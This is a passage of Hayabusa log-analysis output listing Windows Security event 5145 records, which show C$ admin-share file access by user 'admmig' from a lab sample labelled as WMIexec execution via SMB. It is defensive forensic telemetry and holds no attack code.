0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 